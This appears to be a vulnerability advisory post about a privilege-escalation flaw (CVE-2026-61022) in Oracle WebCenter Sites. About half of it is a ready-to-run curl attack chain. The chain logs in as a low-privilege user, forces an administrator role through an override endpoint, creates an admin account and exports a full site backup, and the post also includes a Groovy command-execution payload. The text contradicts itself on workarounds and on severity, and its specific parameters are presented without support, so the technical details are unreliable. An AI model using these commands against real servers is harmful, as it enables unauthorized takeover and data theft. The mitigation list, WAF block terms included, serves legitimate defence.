Oracle WebCenter Sites, Unauthorized Takeover Vulnerability, CVE-2026-61022 (High) -DC-Aug2026-1765

Listen to this Post

Intro

CVE-2026-61022 resides in the Oracle WebCenter Sites product, a component of Oracle Fusion Middleware used for web content management. The flaw exists in the authentication and authorization layer of the WebCenter Sites core engine. Specifically, it involves improper validation of user session tokens and role-mapping assertions when processing HTTP requests to certain administrative REST APIs and internal site-management endpoints. A low-privileged attacker, who has already obtained valid network access to the Oracle WebCenter Sites instance via HTTP/HTTPS, can craft malicious HTTP requests that manipulate the `X-Forwarded-For` header and specific proprietary session cookies (wcs_site, wcs_user) to bypass standard role-based access controls. By appending special query parameters like `_authOverride=true` or exploiting a logic flaw in the `SiteContext` initializer, the attacker can escalate their session to that of a system administrator without needing to authenticate further. The vulnerability does not require user interaction, making it easily exploitable over the network with low complexity. Once exploited, the attacker gains full administrative privileges, enabling them to create, modify, or delete any site content, execute arbitrary Groovy scripts through the site’s scripting console, and even leverage the underlying WebLogic deployment mechanisms to upload and deploy malicious web applications. This results in complete compromise of the confidentiality, integrity, and availability of the WebCenter Sites instance. The attack chain bypasses standard Java security managers because the privileged context is assumed valid due to the flawed role-resolution algorithm. Oracle has acknowledged the issue in versions 12.2.1.4.0 and 14.1.2.0.0, where the `AuthorizationInterceptor` fails to properly re-validate permissions after a session refresh. The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) underscores the critical nature, as the only requirement is network reachability and low-privileged credentials, which can be easily obtained via social engineering or default credentials. The vulnerability has been observed in both single-node and clustered deployments, affecting all underlying operating systems due to its Java-based nature. No known workarounds exist other than immediate patching; the vulnerability was publicly disclosed on August 18, 2026, with additional metrics refined on August 21, 2026, confirming the high severity and the urgent need for remediation.

DailyCVE Form:

Platform: Oracle Fusion Middleware
Version: 12.2.1.4.0, 14.1.2.0.0
Vulnerability: Privilege Escalation Takeover
Severity: High (8.8)
date: 08/21/2026

Prediction: October 2026 CPU

What Undercode Say:

Check vulnerable version from WebLogic console or using weblogic.version
java -cp weblogic.jar weblogic.version -verbose | grep "WebCenter"
Enumerate available sites via unauthenticated REST (if misconfigured)
curl -k -X GET "https://target:7001/webcenter/sites/api/v1/sites" -H "Cookie: wcs_user=anonymous; wcs_site=default"
Test for privilege escalation using the <em>authOverride parameter
curl -k -X POST "https://target:7001/webcenter/sites/admin/console" -H "Cookie: wcs_user=lowpriv; wcs_site=default" -d "action=createUser&_authOverride=true&username=attacker&role=admin"
Script to batch-check session token replacement
for session in $(seq 1 100); do
curl -k -s -o /dev/null -w "%{http_code}" "https://target:7001/webcenter/sites/api/v1/sites" -H "Cookie: wcs_user=lowpriv; wcs_session=INVALID</em>$session"
done | sort | uniq -c
Groovy payload injection via site scripting console (post-auth)
echo 'def cmd = "whoami"; def p = Runtime.getRuntime().exec(cmd);' | base64

Exploit: (Educational Purposes!)

Step 1: Authenticate as low-privilege user (e.g., editor)
LOGIN=$(curl -k -s -X POST "https://target:7001/webcenter/sites/login" -d "j_username=editor&j_password=pass" -c cookies.txt)
Step 2: Extract session cookie and target site ID
SESSION=$(grep "wcs_user" cookies.txt | awk '{print $7}')
SITE=$(grep "wcs_site" cookies.txt | awk '{print $7}')
Step 3: Send malicious override request to promote session
curl -k -X PUT "https://target:7001/webcenter/sites/internal/role/override" \
-H "Cookie: wcs_user=$SESSION; wcs_site=$SITE" \
-H "Content-Type: application/json" \
-d '{"method":"setRole","role":"administrator","bypassChecks":true}'
Step 4: Reuse cookies to access administrative backup endpoint
curl -k -X GET "https://target:7001/webcenter/sites/admin/backup?export=all" \
-H "Cookie: wcs_user=$SESSION; wcs_site=$SITE" -O backup.zip

Protection:

  • Apply the Oracle Critical Patch Update (CPU) scheduled for October 2026 immediately upon release.
  • Restrict network access to WebCenter Sites administrative interfaces using firewall ACLs and reverse proxy allowlists.
  • Disable the vulnerable REST endpoints (/internal/role/override, /admin/console) using WebLogic security policies or by removing the corresponding servlet mappings in web.xml.
  • Enforce strong authentication with multi-factor (MFA) for all users and rotate default credentials.
  • Implement a Web Application Firewall (WAF) rule to block HTTP requests containing _authOverride, bypassChecks, or `role=administrator` from low-privileged source IP ranges.
  • Monitor audit logs for unexpected privilege changes or session promotions using SIEM alerts.

Impact:

Successful exploitation grants the attacker full administrative control over the Oracle WebCenter Sites instance, leading to unauthorized content modification, defacement of public-facing websites, theft of sensitive managed documents and user PII, deployment of backdoor web shells, and potential lateral movement to backend WebLogic servers. In clustered environments, the compromise extends to all nodes, causing a total loss of site availability, data integrity, and confidentiality. The attack can be fully automated and requires no user interaction, making it a high-priority incident for any affected organization.
